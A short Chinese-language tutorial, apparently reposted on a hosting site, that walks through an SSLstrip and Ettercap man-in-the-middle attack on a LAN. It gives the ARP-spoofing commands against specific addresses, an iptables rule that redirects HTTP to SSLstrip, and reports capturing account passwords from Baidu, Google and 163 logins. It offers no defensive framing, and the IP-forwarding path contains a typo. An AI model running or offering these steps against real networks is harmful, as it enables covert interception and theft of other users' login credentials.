***回顾
SSLstrip + EtterCap 中间人***实现https转换成http 以获取帐号密码。
Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。
数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward
然后开启Ettercap的iptables 功能
把注析去掉
来个arp欺骗不使用sslstrip 来测试一下https
Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2
Ok
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
NAT 一定的基础
-T 匹配的表 NAT表 :PREROUTING 修改来的包
:OUTPUT 修改路由前本地的包
:POSTROUTING 修改准备发出的包
-A 表示加入高级选项
-P 协议类型
-J 表示把目标80端口的数据包转到其他端口 上诉命令是10000端口
开启ETTERCAP
Ettercap –T –q –I eth0
登录http的百度 效果良好
监听到数据了
登录google
发现在https 卡顿 无法通过
开启sslstrip
再向google登录的时候 https变成http
成功登录
监听到帐号密码
百度的
163的登录
http的跳转
网速过慢……
除了使用arpspoof 还可以使用
Ettercap –T –q –M arp:remote /192.168.1.101/ //
也是arp欺骗 原理一样的。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。